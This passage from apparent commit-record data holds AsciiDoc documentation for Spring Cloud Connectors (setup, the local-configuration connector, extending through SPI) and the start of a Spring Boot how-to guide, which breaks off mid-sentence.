String greeting) {\n super(id, URI_SCHEME, host, port, username, password, greeting);\n }\n\n \/\/ Needed to support URI-based service definitions such as Heroku's\n public HelloWorldServiceInfo(String id, String uri) {\n super(id, uri);\n }\n}\n----\n\nAfter creating the `ServiceInfo` class, you will need to create a `ServiceInfoCreator` for each cloud platform you want to support. If you are adding service support for a cloud platform already supported by Spring Cloud Connectors, you will probably want to extend the appropriate creator base class(es).\n\n[cols=\"2,8\", width=\"100%\"]\n|==================================================================\n|**Cloud Foundry** | Extend `CloudFoundryServiceInfoCreator`.\n|**Heroku** | Extend `HerokuServiceInfoCreator`.\n|**local-configuration** | Extend `LocalConfigServiceInfoCreator`.\n|==================================================================\n\nA `ServiceInfoCreator` often can be as simple as a method that instantiates a new `ServiceInfo`.\n\n[source,java]\n----\n@Override\npublic HelloWorldServiceInfo createServiceInfo(String id, String uri) {\n return new HelloWorldServiceInfo(id, uri);\n}\n----\n\nRegister your `ServiceInfoCreator` classes in the appropriate provider-configuration file for your cloud's `ServiceInfoCreator` base class.\n\n[cols=\"2,8\", width=\"100%\"]\n|=========================================================================================================================================================================\n|**Cloud Foundry** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.cloudfoundry.CloudFoundryServiceInfoCreator`.\n|**Heroku** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.heroku.HerokuServiceInfoCreator`.\n|**local-configuration** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.localconfig.LocalConfigServiceInfoCreator`.\n|=========================================================================================================================================================================\n\n=== Adding Service Connectors\n\nTo allow Spring Cloud to provide framework-specific service objects for supported cloud services, add a service connector for the framework. A service connector consumes a `ServiceInfo` discovered by the cloud connector and converts it into the appropriate service object (such as a `DataSource` in the case of a service definition that represents a SQL database).\n\n[TIP]\n====\nService connectors can be tightly bound to the framework whose service objects they are creating. For example, some connectors in the <<_spring_service_connector,Spring Service Connector>> create connection factories defined by Spring Data, for use in building Spring Data templates.\n====\n\nYour connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/service\/ServiceConnectorCreator.html[`ServiceConnectorCreator`] interface. It has three methods:\n\n* `SC create()`: Creates a service connection object from a given `ServiceInfo` and configuration.\n* `Class<SC> getServiceConnectorType()`: Returns the type of the connection object that will be created.\n* `Class<?> getServiceInfoType()`: Returns the type of the `ServiceInfo` that the class will accept.\n\nList the fully-qualified connector class names in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.service.ServiceConnectorCreator`.\n\n","old_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-connectors\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 3\n\n= Spring Cloud Connectors\n\n[[spring-cloud-connectors-install]]\n\n== Introduction\n\nSpring Cloud Connectors provides a simple abstraction for JVM-based applications running on cloud platforms to discover bound services and deployment information at runtime, and provides support for registering discovered services as Spring beans. It is based on a plugin model so that the identical compiled application can be deployed locally or on any of multiple cloud platforms, and it supports custom service definitions through Java Service Provider Interfaces (SPI).\n\nThe Connectors project provides out-of-the-box support for discovering common services on Heroku and Cloud Foundry clouds. It also includes a properties-based connector that can supply configuration for development and testing.\n\n=== Concepts\n\nThe core Connectors concepts are described below.\n\n[cols=\"3,7\", width=\"100%\"]\n|===========================================================================================================================================================================\n|**Cloud Connector** |A platform-specific interface that identifies the presence of the platform and discovers any services bound to the application deployment.\n|**Service Connector** |An object that represents a runtime connection to a service (for example, a `javax.sql.DataSource`).\n|**Service Information** |Information about the underlying service (such as host, port, and credentials).\n|**Application Information** |Information about the application and the particular running instance.\n|===========================================================================================================================================================================\n\n=== Submodules\n\nThe project contains three major submodules.\n\n* **Spring Cloud Connectors Core**: The core library, which is both cloud-agnostic and Spring-agnostic. It provides a programmatic entry point for developers who prefer to access cloud services and application information manually. It also provides basic service definitions for several common services (databases, message queues) and an SPI-based extension mechanism for contributing cloud and service connectors.\n* **Spring Cloud Spring Service Connector**: A Spring library that exposes application information, cloud information, and discovered services as Spring beans of the appropriate type (for example, an SQL service will be exposed as a `javax.sql.DataSource` with optional connection pooling).\n* The cloud connectors:\n ** **Spring Cloud Cloud Foundry Connector**: Connector for link:http:\/\/cloudfoundry.org\/[Cloud Foundry].\n ** **Spring Cloud Heroku Connector**: Connector for link:https:\/\/www.heroku.com\/[Heroku].\n ** **Spring Cloud local-configuration Connector**: Properties-based connector for manually providing configuration information during development or testing. Allows use of the same Spring Cloud configuration wiring in all stages of application deployment.\n\n== Getting Started\n\nSee below for examples of how to include the appropriate dependencies using your build system.\n\n=== Including Cloud Connectors\n\nInclude the connector for each cloud platform which you want to be discoverable. Including multiple connectors is perfectly fine; each connector will determine whether it should be active in a particular environment.\n\nIn Maven, replacing `${VERSION}` with the desired artifact version:\n\n[source,xml]\n----\n<!-- To use Spring Cloud Connectors for development -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-localconfig-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Cloud Foundry -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-cloudfoundry-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Heroku -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-heroku-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle, replacing `${VERSION}` with the desired version:\n\n[source,groovy]\n----\ndependencies {\n\n \/\/ To use Spring Cloud Connectors for development\n compile 'org.springframework.cloud:spring-cloud-localconfig-connector:${VERSION}'\n \n \/\/ If you intend to deploy the app to Cloud Foundry\n compile 'org.springframework.cloud:spring-cloud-cloudfoundry-connector:${VERSION}'\n\n \/\/ If you intend to deploy the app to Heroku\n compile 'org.springframework.cloud:spring-cloud-heroku-connector:${VERSION}'\n\n}\n----\n\n=== Spring Applications\n\nIf you're writing a Spring application, include the <<Spring Service Connector>> dependency in addition to your cloud connector dependencies.\n\nIn Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-spring-service-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle:\n\n[source,groovy]\n----\ndependencies {\n\n compile 'org.springframework.cloud:spring-cloud-spring-service-connector:${VERSION}'\n\n}\n----\n\nThen follow the instructions in the <<Spring Service Connector>> documentation on Spring configuration <<spring-cloud-spring-service-connector.adoc#_the_java_configuration,using Java configuration>> or the <<spring-cloud-spring-service-connector.adoc#_the_code_cloud_code_namespace,`<cloud>` namespace>>.\n\n=== Non-Spring Applications\n\nThe `spring-cloud-core` dependency is included by each cloud connector, so simply include the connectors for the platforms you want. Then follow the <<_spring_cloud_connectors_core,instructions on using the Spring Cloud Connectors API>>.\n\n== Spring Cloud Connectors Core\n\nThis core library provides programmatic access to application and service information. This library has no Spring dependencies and may be used in non-Spring applications.\n\n**This library requires Java 6 or newer.** It is cloud-agnostic; using the Java SPI, it supports pluggable cloud and service connectors. Support for Cloud Foundry and Heroku is available out-of-the-box, in addition to locally-provided configuration for development and testing.\n\n=== Connecting to a Cloud\n\n[NOTE]\n====\nIf you are using Spring Cloud in a Spring application, you should consider <<_spring_service_connector,automatically injecting Spring beans>> instead.\n====\n\n* Include the desired cloud connectors on the runtime classpath, <<_getting_started,as described in the main documentation>>.\n\n* Create a `CloudFactory` instance. Creation of a `CloudFactory` instance is a bit expensive, so we recommend using a singleton instance. If you are using a dependency injection framework such as Spring, create a bean for the `CloudFactory`.\n+\n[source,java]\n----\nCloudFactory cloudFactory = new CloudFactory();\n----\n\n* Obtain the `Cloud` object for the environment in which the application is running.\n+\n[source,java]\n----\nCloud cloud = cloudFactory.getCloud();\n----\n+\nNote that you must have a `CloudConnector` suitable for your deployment environment on your classpath. For example, if you are deploying the application to Cloud Foundry, you must add the <<_cloud_foundry_connector,Cloud Foundry Connector>> to your classpath. If no suitable `CloudConnector` is found, the `getCloud()` method will throw a `CloudException`.\n\n* Use the `Cloud` instance to access application and service information and to create service connectors.\n+\n[source,java]\n----\n\/\/ ServiceInfo has all the information necessary to connect to the underlying service\nList<ServiceInfo> serviceInfos = cloud.getServiceInfos();\n----\n+\n[source,java]\n----\n\/\/ Find the `ServiceInfo` definitions suitable for connecting to a particular service type\nList<ServiceInfo> databaseInfos = cloud.getServiceInfos(DataSource.class);\n----\n+\n[source,java]\n----\n\/\/ Alternatively, let Spring Cloud create a service connector for you\nString serviceId = \"inventory-db\";\nDataSource ds = cloud.getServiceConnector(serviceId, DataSource.class,\n null \/* default config *\/);\n----\n\n== Spring Service Connector\n\nSee <<spring-cloud-spring-service-connector.adoc#,Spring Cloud Spring Service Connector>>.\n\n== Cloud Foundry Connector\n\nSee <<spring-cloud-cloud-foundry-connector.adoc#,Spring Cloud Cloud Foundry Connector>>.\n\n== Heroku Connector\n\nSee <<spring-cloud-heroku-connector.adoc#,Spring Cloud Heroku Connector>>.\n\n== local-configuration Connector\n\nThis connector provides the ability to configure Spring Cloud services locally for development or testing. **The current implementation reads from Java properties only.**\n\n=== Quick Start\n\nSince service URIs contain passwords and should not be stored in code, this connector does not attempt to read service definitions out of the classpath. You can provide service definitions as system properties.\n\n[source,term]\n----\njava -Dspring.cloud.database='mysql:\/\/user:pass@host:1234\/dbname' -jar my-app.jar\n----\n\nYou can also provide service definitions from a configuration properties file, either by setting the `spring.cloud.propertiesFile` system property:\n\n[source,term]\n----\njava -Dspring.cloud.propertiesFile=\/path\/to\/spring-cloud.properties -jar my-app.jar\n----\n\nor by providing the bootstrap properties file `spring-cloud-bootstrap.properties` on the runtime classpath. This file will be inspected only for the property named `spring.cloud.propertiesFile`, and its value will be interpolated from the system properties.\n\n[source,properties]\n----\nspring.cloud.propertiesFile: ${user.home}\/.config\/myApp\/spring-cloud.properties\n----\n\nThe system properties, or the configuration properties file, should contain an application ID and the desired services in the following format.\n\n[source,properties]\n----\nspring.cloud.appId: myApp\n; spring.cloud.{id}: URI\nspring.cloud.database: mysql:\/\/user:pass@host:1234\/dbname\n----\n\nThe service type is determined by the URI scheme. The connector will activate if it finds a property (either in the system properties or in the configuration properties file) named `spring.cloud.appId`.\n\n=== Property Sources\n\nThis connector first attempts to read the system properties generally and a system property named `spring.cloud.propertiesFile` specifically. If the system properties are not readable (if the security manager denies `checkPropertiesAccess`), then they will be treated as empty. If a system property named `spring.cloud.propertiesFile` is found, then that file will be loaded as a property list.\n\n==== Providing a Bootstrap Properties File\n\nTo avoid having to manually configure run configurations or test runners with the path to the configuration properties file, the connector can read a templated filename out of the runtime classpath. This file must be named `spring-cloud-bootstrap.properties` and be located at the classpath root. For security, the connector will not attempt to read any service URIs out of the file. If the connector does find the file, it will read the property `spring.cloud.propertiesFile` and link:http:\/\/commons.apache.org\/proper\/commons-lang\/javadocs\/api-release\/index.html?org\/apache\/commons\/lang3\/text\/StrSubstitutor.html[substitute the pattern `${system.property}`] with the appropriate value from the system properties. The most useful option is generally `${user.home}`.\n\nA configuration properties file specified in the system properties will override any bootstrap file that may be available on the classpath.\n\n==== Property Precedence\n\nTo provide the maximum configuration flexibility, the connector will override any properties (both application ID and service definitions) specified in the file at `spring.cloud.propertiesFile` with system properties defined at runtime. The connector will log a message at `WARN` if you override a service ID.\n\n=== Activating the Connector\n\nSpring Cloud Core expects exactly one cloud connector to match the runtime environment. This connector identifies the “local cloud” by the presence of a property, in a configuration properties file or in the system properties, named `spring.cloud.appId`. This property will be used in the `ApplicationInstanceInfo`.\n\n=== Service Definitions\n\nIf the connector is activated, it will iterate through all of the available properties for keys matching the pattern `spring.cloud.{serviceId}`. Each value is interpreted as a URI to a service, and the type of service is determined from the scheme. Every standard `UriBasedServiceInfo` is supported.\n\n=== Instance ID\n\nThis connector creates a UUID for use as the instance ID, as Java does not provide any portable mechanism for reliably determining hostnames or PIDs.\n\n== Extending Spring Cloud Connectors\n\nBesides the built-in service and cloud support and the included Spring Service Connector, Spring Cloud Connectors can be extended to support additional cloud platforms, cloud services, or application frameworks. See below for details.\n\n=== Adding Cloud Connectors\n\nTo allow Spring Cloud to detect a new cloud platform, add a cloud connector for the platform. A cloud connector determines whether the application is running in the specific cloud, identifies application information (such as the name and instance ID of the particular running instance), and maps bound services (such as URIs exposed in environment variables) as `ServiceInfo` objects.\n\n[TIP]\n====\nSee the https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-cloudfoundry-connector[Cloud Foundry Connector] and https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-heroku-connector[Heroku Connector] for examples.\n====\n\nSpring Cloud uses the https:\/\/docs.oracle.com\/javase\/tutorial\/sound\/SPI-intro.html[Java SPI] to discover available connectors. \n\nTo add new cloud connectors, your connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/CloudConnector.html[`CloudConnector`] interface. It includes three methods:\n\n* `boolean isInMatchingCloud()`: Determines whether the connector is operating in the cloud for which it provides support.\n+\nSpring Cloud Connectors will call `isInMatchingCloud()` on each cloud connector included in an application. The first connector to respond `true` will be activated.\n* `ApplicationInstanceInfo getApplicationInstanceInfo()`: Returns information about the running application instance.\n+\nAn `ApplicationInstanceInfo` must provide the instance id (`String`) and application id (`String`). Other properties can be added as needed to a `Map` and be returned via `getProperties()`.\n* `List<ServiceInfo> getServiceInfos()`: Returns a `ServiceInfo` object for each service bound to the application.\n+\n`getServiceInfos()` can return an empty `List` if no services have been bound to the application.\n\nNew cloud connectors should list the fully-qualified class name in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.CloudConnector`.\n\n=== Adding Service Support\n\nTo allow Spring Cloud to discover a new type of service, create a `ServiceInfo` class containing the information necessary to connect to the service. If your service can be specified via a URI, extend http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/org\/springframework\/cloud\/service\/UriBasedServiceInfo.html[`UriBasedServiceInfo`] and provide the URI scheme in a call to the `super` constructor.\n\nThe following class will expose information for a `HelloWorldService` available at `helloworld:\/\/username:password@host:port\/Bonjour`.\n\n[source,java]\n----\npublic class HelloWorldServiceInfo extends UriBasedServiceInfo {\n public static final String URI_SCHEME = \"helloworld\";\n\n \/\/ Needed to support structured service definitions such as Cloud Foundry's\n public HelloWorldServiceInfo(String id, String host, int port, String username, String password, String greeting) {\n super(id, URI_SCHEME, host, port, username, password, greeting);\n }\n\n \/\/ Needed to support URI-based service definitions such as Heroku's\n public HelloWorldServiceInfo(String id, String uri) {\n super(id, uri);\n }\n}\n----\n\nAfter creating the `ServiceInfo` class, you will need to create a `ServiceInfoCreator` for each cloud platform you want to support. If you are adding service support for a cloud platform already supported by Spring Cloud Connectors, you will probably want to extend the appropriate creator base class(es).\n\n[cols=\"2,8\", width=\"100%\"]\n|==================================================================\n|**Cloud Foundry** | Extend `CloudFoundryServiceInfoCreator`.\n|**Heroku** | Extend `HerokuServiceInfoCreator`.\n|**local-configuration** | Extend `LocalConfigServiceInfoCreator`.\n|==================================================================\n\nA `ServiceInfoCreator` often can be as simple as a method that instantiates a new `ServiceInfo`.\n\n[source,java]\n----\n@Override\npublic HelloWorldServiceInfo createServiceInfo(String id, String uri) {\n return new HelloWorldServiceInfo(id, uri);\n}\n----\n\nRegister your `ServiceInfoCreator` classes in the appropriate provider-configuration file for your cloud's `ServiceInfoCreator` base class.\n\n[cols=\"2,8\", width=\"100%\"]\n|=========================================================================================================================================================================\n|**Cloud Foundry** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.cloudfoundry.CloudFoundryServiceInfoCreator`.\n|**Heroku** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.heroku.HerokuServiceInfoCreator`.\n|**local-configuration** | Add the fully-qualified class name for your creator to `META-INF\/service\/org.springframework.cloud.localconfig.LocalConfigServiceInfoCreator`.\n|=========================================================================================================================================================================\n\n=== Adding Service Connectors\n\nTo allow Spring Cloud to provide framework-specific service objects for supported cloud services, add a service connector for the framework. A service connector consumes a `ServiceInfo` discovered by the cloud connector and converts it into the appropriate service object (such as a `DataSource` in the case of a service definition that represents a SQL database).\n\n[TIP]\n====\nService connectors can be tightly bound to the framework whose service objects they are creating. For example, some connectors in the <<_spring_service_connector,Spring Service Connector>> create connection factories defined by Spring Data, for use in building Spring Data templates.\n====\n\nTo add new service connectors, your connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/service\/ServiceConnectorCreator.html[`ServiceConnectorCreator`] interface. It has three methods:\n\n* `SC create()`: Creates a service connection object from a given `ServiceInfo` and configuration.\n* `Class<SC> getServiceConnectorType()`: Returns the type of the connection object that will be created.\n* `Class<?> getServiceInfoType()`: Returns the type of the `ServiceInfo` that the class will accept.\n\nList the fully-qualified connector class names in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.service.ServiceConnectorCreator`.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aed4f58403ca56a408f24b84186253c89ca07371","subject":"Fix capitalization of Testcontainers in Howto docs","message":"Fix capitalization of Testcontainers in Howto docs\n\nSee gh-21417\n","repos":"jxblum\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,mbenson\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,mdeinum\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,mbenson\/spring-boot,spring-projects\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,yangdd1205\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,royclarkson\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,shakuzen\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,michael-simons\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,royclarkson\/spring-boot,yangdd1205\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,Buzzardo\/spring-boot,chrylis\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot,mbenson\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/docs\/asciidoc\/howto.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/docs\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= \"`How-to`\" Guides\ninclude::attributes.adoc[]\n\nThis section provides answers to some common '`how do I do that...`' questions that often arise when using Spring Boot.\nIts coverage is not exhaustive, but it does cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out https:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has already provided an answer.\nThis is also a great place to ask new questions (please use the `spring-boot` tag).\n\nWe are also more than happy to extend this section.\nIf you want to add a '`how-to`', send us a {spring-boot-code}[pull request].\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{spring-boot-module-api}\/diagnostics\/FailureAnalyzer.html[`FailureAnalyzer`] is a great way to intercept an exception on startup and turn it into a human-readable message, wrapped in a {spring-boot-module-api}\/diagnostics\/FailureAnalysis.html[`FailureAnalysis`].\nSpring Boot provides such an analyzer for application-context-related exceptions, JSR-303 validations, and more.\nYou can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the presence of a specified exception type in the exception to handle.\nYou can extend from that so that your implementation gets a chance to handle the exception only when it is actually present.\nIf, for whatever reason, you cannot handle the exception, return `null` to give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer` can simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but sometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot `ApplicationContext`.\nYou can see it if you enable `DEBUG` logging output.\nIf you use the `spring-boot-actuator` (see <<production-ready-features.adoc#production-ready,the Actuator chapter>>), there is also a `conditions` endpoint that renders the report in JSON.\nUse that endpoint to debug the application and see what features have been added (and which have not been added) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc.\nWhen reading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources.\n Pay special attention to the `+@Conditional*+` annotations to find out what features they enable and when.\n Add `--debug` to the command line or a System property `-Ddebug` to get a log on the console of all the auto-configuration decisions that were made in your app.\n In a running application with actuator enabled, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX equivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`]) and read from there the available external configuration options.\n The `@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to external properties.\n Thus, `ServerProperties` has `prefix=\"server\"` and its configuration properties are `server.port`, `server.address`, and others.\n In a running application with actuator enabled, look at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values explicitly out of the `Environment` in a relaxed manner.\n It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in response to SpEL expressions, normally evaluated with placeholders resolved from the `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that are used to apply customizations to the context or environment.\nSpring Boot loads a number of such customizations for use internally from `META-INF\/spring.factories`.\nThere is more than one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers` methods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or `context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some even before the context is created) and then registers the listeners for events published by the `ApplicationContext` as well.\nSee \"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners,Application Events and Listeners>>`\" in the '`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is refreshed by using `EnvironmentPostProcessor`.\nEach implementation should be registered in `META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`.\nFor instance, the following example loads a YAML configuration file from the classpath:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources that Spring Boot loads by default.\nIt is therefore possible to get the location of the file from the environment.\nThe preceding example adds the `custom-resource` property source at the end of the list so that a key defined in any of the usual other locations takes precedence.\nA custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a convenient way to load a custom resource in the `Environment`, we do not recommend it.\nSuch property sources are not added to the `Environment` until the application context is being refreshed.\nThis is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext` hierarchies.\nSee \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\" in the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services).\nIf you want to execute some code in a `main` method but also bootstrap a Spring application to set up the infrastructure to use, you can use the `SpringApplication` features of Spring Boot.\nA `SpringApplication` changes its `ApplicationContext` class, depending on whether it thinks it needs a web application or not.\nThe first thing you can do to help it is to leave server-related dependencies (e.g. servlet API) off the classpath.\nIf you cannot do that (for example, you run two applications from the same code base) then you can explicitly call `setWebApplicationType(WebApplicationType.NONE)` on your `SpringApplication` instance or set the `applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a `CommandLineRunner` and dropped into the context as a `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\nThis section includes topics about setting and reading properties and configuration settings and their interaction with Spring Boot applications.\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build configuration, you can automatically expand them by instead using the existing build configuration.\nThis is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource filtering.\nIf you use the `spring-boot-starter-parent`, you can then refer to your Maven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is applied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add `src\/main\/resources` directly to the classpath (for hot reloading purposes).\nDoing so circumvents the resource filtering and this feature.\nInstead, you can use the `exec:java` goal or customize the plugin's configuration.\nSee the {spring-boot-maven-plugin-docs}#getting-started[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside the `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring placeholders (such as `$\\{placeholder}`) in your configuration.\nIf that property is not set to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the Java plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms `${..}` tokens.\nThe `${..}` style conflicts with Spring's own property placeholder mechanism.\nTo use Spring property placeholders together with automatic expansion, escape the Spring property placeholders as follows: `\\${..}`.\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as you create the application to modify its behavior.\nAlternatively, you can externalize the configuration by setting properties in `+spring.main.*+`.\nFor example, in `application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring 